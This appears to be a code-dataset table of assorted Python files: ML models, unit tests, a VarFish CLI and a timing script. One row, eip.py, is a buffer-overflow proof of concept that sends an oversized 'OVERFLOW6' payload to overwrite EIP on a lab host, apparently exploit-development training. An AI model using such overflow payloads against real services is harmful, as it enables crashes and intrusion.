content stringlengths 27 928k | path stringlengths 4 230 | size int64 27 928k | nl_text stringlengths 21 396k | nl_size int64 21 396k | nl_language stringlengths 2 3 | nl_language_score float64 0.04 1 |
|---|---|---|---|---|---|---|
# Copyright (c) 2019-2020, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
sys.path.append("../common")
import os
import unittest
import numpy as np
import infer_util as iu
import test_util as tu
np_dtype_string = np.dtype(object)
TEST_SYSTEM_SHARED_MEMORY = bool(
int(os.environ.get('TEST_SYSTEM_SHARED_MEMORY', 0)))
TEST_CUDA_SHARED_MEMORY = bool(int(os.environ.get('TEST_CUDA_SHARED_MEMORY',
0)))
class InferVariableTest(unittest.TestCase):
def _full_exact(self,
input_dtype,
output0_dtype,
output1_dtype,
input_shape,
output0_shape,
output1_shape,
output0_raw=True,
output1_raw=True,
swap=False):
def _infer_exact_helper(tester,
pf,
tensor_shape,
batch_size,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=True,
output1_raw=True,
model_version=None,
swap=False,
outputs=("OUTPUT0", "OUTPUT1"),
use_http=True,
use_grpc=True,
skip_request_id_check=False,
use_streaming=True,
correlation_id=0):
for bs in (1, batch_size):
# model that does not support batching
if bs == 1:
iu.infer_exact(
tester,
pf + "_nobatch",
tensor_shape,
bs,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw,
output1_raw,
model_version,
swap,
outputs,
use_http,
use_grpc,
skip_request_id_check,
use_streaming,
correlation_id,
use_system_shared_memory=TEST_SYSTEM_SHARED_MEMORY,
use_cuda_shared_memory=TEST_CUDA_SHARED_MEMORY)
# model that supports batching
iu.infer_exact(
tester,
pf, (bs,) + tensor_shape,
bs,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw,
output1_raw,
model_version,
swap,
outputs,
use_http,
use_grpc,
skip_request_id_check,
use_streaming,
correlation_id,
use_system_shared_memory=TEST_SYSTEM_SHARED_MEMORY,
use_cuda_shared_memory=TEST_CUDA_SHARED_MEMORY)
all_ensemble_prefix = ["simple_", "sequence_", "fan_"]
ensemble_prefix = [""]
for prefix in all_ensemble_prefix:
if tu.validate_for_ensemble_model(prefix, input_dtype,
output0_dtype, output1_dtype,
input_shape, input_shape,
input_shape):
ensemble_prefix.append(prefix)
if tu.validate_for_tf_model(input_dtype, output0_dtype, output1_dtype,
input_shape, output0_shape, output1_shape):
for prefix in ensemble_prefix:
for pf in ["graphdef", "savedmodel"]:
_infer_exact_helper(self,
prefix + pf,
input_shape,
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=swap)
if tu.validate_for_trt_model(input_dtype, output0_dtype, output1_dtype,
input_shape, output0_shape, output1_shape):
for prefix in ensemble_prefix:
if input_dtype == np.int8:
_infer_exact_helper(self,
prefix + 'plan',
input_shape + (1, 1),
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=swap)
else:
_infer_exact_helper(self,
prefix + 'plan',
input_shape,
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=swap)
if tu.validate_for_c2_model(input_dtype, output0_dtype, output1_dtype,
input_shape, output0_shape, output1_shape):
for prefix in ensemble_prefix:
_infer_exact_helper(self,
prefix + 'netdef',
input_shape,
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=swap)
# the custom model is src/custom/addsub... it does not swap
# the inputs so always set to False
if tu.validate_for_custom_model(input_dtype, output0_dtype,
output1_dtype, input_shape,
output0_shape, output1_shape):
# No basic ensemble models are created against custom models
_infer_exact_helper(self,
'custom',
input_shape,
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=False)
if tu.validate_for_onnx_model(input_dtype, output0_dtype, output1_dtype,
input_shape, output0_shape,
output1_shape):
# No basic ensemble models are created against custom models [TODO]
_infer_exact_helper(self,
'onnx',
input_shape,
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=swap)
if tu.validate_for_libtorch_model(input_dtype, output0_dtype,
output1_dtype, input_shape,
output0_shape, output1_shape):
# No basic ensemble models are created against custom models [TODO]
_infer_exact_helper(self,
'libtorch',
input_shape,
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=swap)
def test_raw_fff(self):
self._full_exact(np.float32, np.float32, np.float32, (16,), (16,),
(16,))
def test_raw_fii(self):
self._full_exact(np.float32, np.int32, np.int32, (2, 8), (2, 8), (2, 8))
def test_raw_fll(self):
self._full_exact(np.float32, np.int64, np.int64, (8, 4), (8, 4), (8, 4))
def test_raw_fil(self):
self._full_exact(np.float32, np.int32, np.int64, (2, 8, 2), (2, 8, 2),
(2, 8, 2))
def test_raw_ffi(self):
self._full_exact(np.float32, np.float32, np.int32, (16,), (16,), (16,))
def test_raw_iii(self):
self._full_exact(np.int32, np.int32, np.int32, (2, 8), (2, 8), (2, 8))
def test_faw_iif(self):
self._full_exact(np.int32, np.int32, np.float32, (2, 8, 2), (2, 8, 2),
(2, 8, 2))
def test_raw_ooo(self):
self._full_exact(np_dtype_string, np_dtype_string, np_dtype_string,
(16,), (16,), (16,))
def test_raw_oii(self):
self._full_exact(np_dtype_string, np.int32, np.int32, (2, 8), (2, 8),
(2, 8))
def test_raw_ooi(self):
self._full_exact(np_dtype_string, np_dtype_string, np.int32, (8, 4),
(8, 4), (8, 4))
def test_raw_oio(self):
self._full_exact(np_dtype_string, np.int32, np_dtype_string, (2, 8, 2),
(2, 8, 2), (2, 8, 2))
def test_class_fff(self):
self._full_exact(np.float32,
np.float32,
np.float32, (16,), (16,), (16,),
output0_raw=False,
output1_raw=False)
def test_class_fii(self):
self._full_exact(np.float32,
np.int32,
np.int32, (2, 8), (2, 8), (2, 8),
output0_raw=False,
output1_raw=False)
def test_class_fll(self):
self._full_exact(np.float32,
np.int64,
np.int64, (8, 4), (8, 4), (8, 4),
output0_raw=False,
output1_raw=False)
def test_class_fil(self):
self._full_exact(np.float32,
np.int32,
np.int64, (2, 8, 2), (2, 8, 2), (2, 8, 2),
output0_raw=False,
output1_raw=False)
def test_class_ffi(self):
self._full_exact(np.float32,
np.float32,
np.int32, (16,), (16,), (16,),
output0_raw=False,
output1_raw=False)
def test_class_iii(self):
self._full_exact(np.int32,
np.int32,
np.int32, (2, 8), (2, 8), (2, 8),
output0_raw=False,
output1_raw=False)
def test_class_iif(self):
self._full_exact(np.int32,
np.int32,
np.float32, (2, 8, 2), (2, 8, 2), (2, 8, 2),
output0_raw=False,
output1_raw=False)
def test_mix_ffi(self):
self._full_exact(np.float32,
np.float32,
np.int32, (16,), (16,), (16,),
output0_raw=True,
output1_raw=False)
def test_mix_iii(self):
self._full_exact(np.int32,
np.int32,
np.int32, (2, 8), (2, 8), (2, 8),
output0_raw=False,
output1_raw=True)
def test_mix_iif(self):
self._full_exact(np.int32,
np.int32,
np.float32, (2, 8, 2), (2, 8, 2), (2, 8, 2),
output0_raw=True,
output1_raw=False)
if __name__ == '__main__':
unittest.main()
| qa/L0_infer_variable/infer_variable_test.py | 14,508 | Copyright (c) 2019-2020, NVIDIA CORPORATION. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of NVIDIA CORPORATION nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. model that does not support batching model that supports batching the custom model is src/custom/addsub... it does not swap the inputs so always set to False No basic ensemble models are created against custom models No basic ensemble models are created against custom models [TODO] No basic ensemble models are created against custom models [TODO] | 1,836 | en | 0.909002 |
# -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id: 790cd19ca8b22937365bf24b6e40ed90c79ee12b $'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
unittest.main()
| tests/cache_tests.py | 1,258 | Validate cache entries.
Assert validity of the cache entry.
Test the apicache by doing _check_cache_entry over each entry.
API Request cache tests.
-*- coding: utf-8 -*- (C) Pywikibot team, 2012-2014 Distributed under the terms of the MIT license. TODO: more tests on entry._params, and possibly fixes needed to make it closely replicate the original object. | 361 | en | 0.755548 |
import numpy as np
import math
from ml_from_scratch.activation_functions import Sigmoid
from ml_from_scratch.utils import make_diagonal
class LogisticRegression():
""" Logistic Regression classifier.
Parameters:
-----------
n_iters: int
Number of iterations running gradient descent, default is 1000
lr: float
learning rate
gradient_descent: boolean
True or false depending if gradient descent should be used when training. If
false then we use Newton Method.
"""
def __init__(self, n_iters=1000, lr=.1, gradient_descent=True):
self.param = None
self.n_iters = n_iters
self.lr = lr
self.gradient_descent = gradient_descent
self.sigmoid = Sigmoid()
def _initialize_parameters(self, X):
n_features = np.shape(X)[1]
# Initialize parameters between [-1/sqrt(N), 1/sqrt(N)]
limit = 1 / math.sqrt(n_features)
self.param = np.random.uniform(-limit, limit, (n_features,))
def fit(self, X, y):
self._initialize_parameters(X)
# Tune parameters for n iterations
for i in range(self.n_iters):
# Make a new prediction
y_pred = self.sigmoid(X.dot(self.param))
if self.gradient_descent:
# Move against the gradient of the loss function with
# respect to the parameters to minimize the loss
self.param -= self.lr * (y_pred - y).dot(X)
else:
# Make a diagonal matrix of the sigmoid gradient column vector
diag_gradient = make_diagonal(self.sigmoid.gradient(X.dot(self.param)))
# Batch opt:
self.param = np.linalg.pinv(X.T.dot(diag_gradient).dot(X)).\
dot(X.T).dot(diag_gradient.dot(X).dot(self.param) + y - y_pred)
def predict(self, X):
y_pred = np.round(self.sigmoid(X.dot(self.param))).astype(int)
return y_pred
def predict_proba(self, X):
p_pred = self.sigmoid(X.dot(self.param))
return p_pred
| ml_from_scratch/logistic_regression.py | 2,074 | Logistic Regression classifier.
Parameters:
-----------
n_iters: int
Number of iterations running gradient descent, default is 1000
lr: float
learning rate
gradient_descent: boolean
True or false depending if gradient descent should be used when training. If
false then we use Newton Method.
Initialize parameters between [-1/sqrt(N), 1/sqrt(N)] Tune parameters for n iterations Make a new prediction Move against the gradient of the loss function with respect to the parameters to minimize the loss Make a diagonal matrix of the sigmoid gradient column vector Batch opt: | 589 | en | 0.534846 |
#!/usr/bin/env python3
import sys
import psutil
import subprocess
import numpy as np
import matplotlib.pyplot as plt
if (len(sys.argv) < 2):
print("usage: python3 driver.py <runs>")
sys.exit(1)
input_file = 'fib_time'
output_file = "time.png"
runs = int(sys.argv[1])
def outlier_filter(data, threshold=2):
data = np.array(data)
z = np.abs((data - data.mean()) / data.std())
return data[z < threshold]
def data_processing(data, n):
catgories = data[0].shape[0]
samples = data[0].shape[1]
final = np.zeros((catgories, samples))
for c in range(catgories):
for s in range(samples):
final[c][s] = \
outlier_filter([data[i][c][s] for i in range(n)]).mean()
return final
if __name__ == '__main__':
Ys = []
for i in range(runs):
# bind process on cpu0
subprocess.run('sudo taskset 0x1 ./client 2>&1 > /dev/null', shell=True)
output = np.loadtxt(input_file, dtype='float').T
Ys.append(np.delete(output, 0, 0))
X = output[0]
Y = data_processing(Ys, runs)
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
ax.set_title('perf', fontsize=16)
ax.set_xlabel(r'$n_{th} fibonacci$', fontsize=16)
ax.set_ylabel('time (ns)', fontsize=16)
ax.plot(X, Y[0], marker='*', markersize=3, label='user') # user
ax.plot(X, Y[1], marker='+', markersize=3, label='kernel') # kernel
ax.plot(X, Y[2], marker='^', markersize=3, label='kernel to user') # kernel to user
ax.legend(loc = 'upper left')
plt.subplots_adjust(bottom=0.15)
plt.savefig(output_file, bbox_inches="tight")
plt.show()
| scripts/driver.py | 1,661 | !/usr/bin/env python3 bind process on cpu0 user kernel kernel to user | 69 | en | 0.540465 |
import socket
import sys
import time
print("[+] Nani???? EIP!!\n")
buff = "A" * 1034
EIP = "B" * 4
Fill = "C" * 62
payload = buff + EIP + Fill
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the Application
s.connect(('192.168.1.117', 1337))
s.recv(1024) #Recv the banner
#Finally the vulnerable command
s.send('OVERFLOW6 ' + payload + '\r\n')
s.send('EXIT\r\n')
s.close()
print("[+] Execution Finished")
| 6/eip.py | 437 | Connect to the ApplicationRecv the bannerFinally the vulnerable command | 71 | en | 0.735904 |
"""Main entry point for VarFish CLI."""
import argparse
import logging
import os
import sys
import logzero
import toml
from logzero import logger
from varfish_cli import __version__
from .common import run_nocmd, CommonConfig
from .case import setup_argparse as setup_argparse_case
from .case import run as run_case
#: Paths to search the global configuration in.
GLOBAL_CONFIG_PATHS = ("~/.varfishrc.toml",)
def setup_argparse_only(): # pragma: nocover
"""Wrapper for ``setup_argparse()`` that only returns the parser.
Only used in sphinx documentation via ``sphinx-argparse``.
"""
return setup_argparse()[0]
def setup_argparse():
"""Create argument parser."""
# Construct argument parser and set global options.
parser = argparse.ArgumentParser(prog="varfish-cli")
parser.add_argument("--verbose", action="store_true", default=False, help="Increase verbosity.")
parser.add_argument("--version", action="version", version="%%(prog)s %s" % __version__)
group = parser.add_argument_group("Basic Configuration")
group.add_argument(
"--no-verify-ssl",
dest="verify_ssl",
default=True,
action="store_false",
help="Disable HTTPS SSL verification",
)
group.add_argument(
"--config",
default=os.environ.get("VARFISH_CONFIG_PATH", None),
help="Path to configuration file.",
)
group.add_argument(
"--varfish-server-url",
default=os.environ.get("VARFISH_SERVER_URL", None),
help="VarFish server URL key to use, defaults to env VARFISH_SERVER_URL.",
)
group.add_argument(
"--varfish-api-token",
default=os.environ.get("VARFISH_API_TOKEN", None),
help="VarFish API token to use, defaults to env VARFISH_API_TOKEN.",
)
# Add sub parsers for each argument.
subparsers = parser.add_subparsers(dest="cmd")
setup_argparse_case(subparsers.add_parser("case", help="Work with cases."))
return parser, subparsers
def main(argv=None):
"""Main entry point before parsing command line arguments."""
# Setup command line parser.
parser, subparsers = setup_argparse()
# Actually parse command line arguments.
args = parser.parse_args(argv)
# Setup logging incl. verbosity.
if args.verbose: # pragma: no cover
level = logging.DEBUG
else:
# Remove module name and line number if not running in debug mode.s
formatter = logzero.LogFormatter(
fmt="%(color)s[%(levelname)1.1s %(asctime)s]%(end_color)s %(message)s"
)
logzero.formatter(formatter)
level = logging.INFO
logzero.loglevel(level=level)
# Load configuration, if any.
if args.config:
config_paths = (args.config,)
else:
config_paths = GLOBAL_CONFIG_PATHS
for config_path in config_paths:
config_path = os.path.expanduser(os.path.expandvars(config_path))
if os.path.exists(config_path):
with open(config_path, "rt") as tomlf:
toml_config = toml.load(tomlf)
break
else:
toml_config = None
logger.info("Could not find any of the global configuration files %s.", config_paths)
# Merge configuration from command line/environment args and configuration file.
config = CommonConfig.create(args, toml_config)
# Handle the actual command line.
cmds = {None: run_nocmd, "case": run_case}
res = cmds[args.cmd](
config, toml_config, args, parser, subparsers.choices[args.cmd] if args.cmd else None
)
if not res:
logger.info("All done. Have a nice day!")
else: # pragma: nocover
logger.error("Something did not work out correctly.")
return res
if __name__ == "__main__": # pragma: no cover
sys.exit(main(sys.argv))
| varfish_cli/__main__.py | 3,826 | Main entry point before parsing command line arguments.
Create argument parser.
Wrapper for ``setup_argparse()`` that only returns the parser.
Only used in sphinx documentation via ``sphinx-argparse``.
Main entry point for VarFish CLI.
: Paths to search the global configuration in. pragma: nocover Construct argument parser and set global options. Add sub parsers for each argument. Setup command line parser. Actually parse command line arguments. Setup logging incl. verbosity. pragma: no cover Remove module name and line number if not running in debug mode.s Load configuration, if any. Merge configuration from command line/environment args and configuration file. Handle the actual command line. pragma: nocover pragma: no cover | 737 | en | 0.451295 |
import tensorflow.keras.backend as K
import tensorflow as tf
from tensorflow.keras.layers import Input, Conv2D, UpSampling2D, BatchNormalization, ZeroPadding2D, MaxPooling2D, Reshape, \
Concatenate, Lambda
from tensorflow.keras.models import Model
from tensorflow.keras.utils import multi_gpu_model
from tensorflow.keras.utils import plot_model
from custom_layers.unpooling_layer import Unpooling
ATROUS_RATES = [6, 12, 18]
# Conv-MaxPool SPP 24M
def build_encoder_decoder():
# Encoder
input_tensor = Input(shape=(320, 320, 4))
x = ZeroPadding2D((1, 1))(input_tensor)
x = Conv2D(64, (3, 3), activation='relu', name='conv1_1')(x)
x = BatchNormalization()(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(64, (3, 3), activation='relu', name='conv1_2')(x)
x = BatchNormalization()(x)
orig_1 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(128, (3, 3), activation='relu', name='conv2_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(128, (3, 3), activation='relu', name='conv2_2')(x)
orig_2 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_2')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_3')(x)
orig_3 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
inputs_size = x.get_shape()[1:3]
conv_4_1x1 = Conv2D(512, (1, 1), activation='relu', padding='same', name='conv4_1x1')(x)
conv_4_3x3_1 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[0], name='conv4_3x3_1')(x)
conv_4_3x3_2 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[1], name='conv4_3x3_2')(x)
conv_4_3x3_3 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[2], name='conv4_3x3_3')(x)
# Image average pooling
image_level_features = Lambda(lambda x: tf.reduce_mean(x, [1, 2], keepdims=True), name='global_average_pooling')(x)
image_level_features = Conv2D(512, (1, 1), activation='relu', padding='same', name='image_level_features_conv_1x1')(image_level_features)
image_level_features = Lambda(lambda x: tf.image.resize(x, inputs_size), name='upsample_1')(image_level_features)
# Concat
x = Concatenate(axis=3)([conv_4_1x1, conv_4_3x3_1, conv_4_3x3_2, conv_4_3x3_3, image_level_features])
x = Conv2D(512, (1,1), activation='relu', padding='same', name='conv_1x1_1_concat')(x)
x = Conv2D(512, (1,1), activation='relu', padding='same', name='conv_1x1_2_concat')(x)
orig_4 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_2')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_3')(x)
orig_5 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
# Decoder
#
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_5)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_5)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_4)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_4)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_3)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_3)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_2)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_2)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv2_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv2_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_1)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_1)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv1_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv1_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='pred', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
model = Model(inputs=input_tensor, outputs=x)
return model
def build_refinement(encoder_decoder):
input_tensor = encoder_decoder.input
input = Lambda(lambda i: i[:, :, :, 0:3])(input_tensor)
x = Concatenate(axis=3)([input, encoder_decoder.output])
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='refinement_pred', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
model = Model(inputs=input_tensor, outputs=x)
return model
if __name__ == '__main__':
with tf.device("/cpu:0"):
encoder_decoder = build_encoder_decoder()
print(encoder_decoder.summary())
plot_model(encoder_decoder, to_file='encoder_decoder.svg', show_layer_names=True, show_shapes=True)
with tf.device("/cpu:0"):
refinement = build_refinement(encoder_decoder)
print(refinement.summary())
plot_model(refinement, to_file='refinement.svg', show_layer_names=True, show_shapes=True)
parallel_model = multi_gpu_model(refinement, gpus=None)
print(parallel_model.summary())
plot_model(parallel_model, to_file='parallel_model.svg', show_layer_names=True, show_shapes=True)
K.clear_session()
| segnet_v7.py | 9,171 | Conv-MaxPool SPP 24M Encoder Image average pooling Concat Decoder | 65 | en | 0.558554 |
# This code is adapted from the https://github.com/tensorflow/models/tree/master/official/r1/resnet.
# ==========================================================================================
# NAVER’s modifications are Copyright 2020 NAVER corp. All rights reserved.
# ==========================================================================================
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Hooks helper to return a list of TensorFlow hooks for training by name.
More hooks can be added to this set. To add a new hook, 1) add the new hook to
the registry in HOOKS, 2) add a corresponding function that parses out necessary
parameters.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf # pylint: disable=g-bad-import-order
from official.utils.logs import hooks
from official.utils.logs import logger
from official.utils.logs import metric_hook
_TENSORS_TO_LOG = dict((x, x) for x in ['learning_rate',
'cross_entropy',
'train_ece',
'train_accuracy'])
def get_train_hooks(name_list, use_tpu=False, **kwargs):
"""Factory for getting a list of TensorFlow hooks for training by name.
Args:
name_list: a list of strings to name desired hook classes. Allowed:
LoggingTensorHook, ProfilerHook, ExamplesPerSecondHook, which are defined
as keys in HOOKS
use_tpu: Boolean of whether computation occurs on a TPU. This will disable
hooks altogether.
**kwargs: a dictionary of arguments to the hooks.
Returns:
list of instantiated hooks, ready to be used in a classifier.train call.
Raises:
ValueError: if an unrecognized name is passed.
"""
if not name_list:
return []
if use_tpu:
tf.logging.warning("hooks_helper received name_list `{}`, but a TPU is "
"specified. No hooks will be used.".format(name_list))
return []
train_hooks = []
for name in name_list:
hook_name = HOOKS.get(name.strip().lower())
if hook_name is None:
raise ValueError('Unrecognized training hook requested: {}'.format(name))
else:
train_hooks.append(hook_name(**kwargs))
return train_hooks
def get_logging_tensor_hook(every_n_iter=100, tensors_to_log=None, **kwargs): # pylint: disable=unused-argument
"""Function to get LoggingTensorHook.
Args:
every_n_iter: `int`, print the values of `tensors` once every N local
steps taken on the current worker.
tensors_to_log: List of tensor names or dictionary mapping labels to tensor
names. If not set, log _TENSORS_TO_LOG by default.
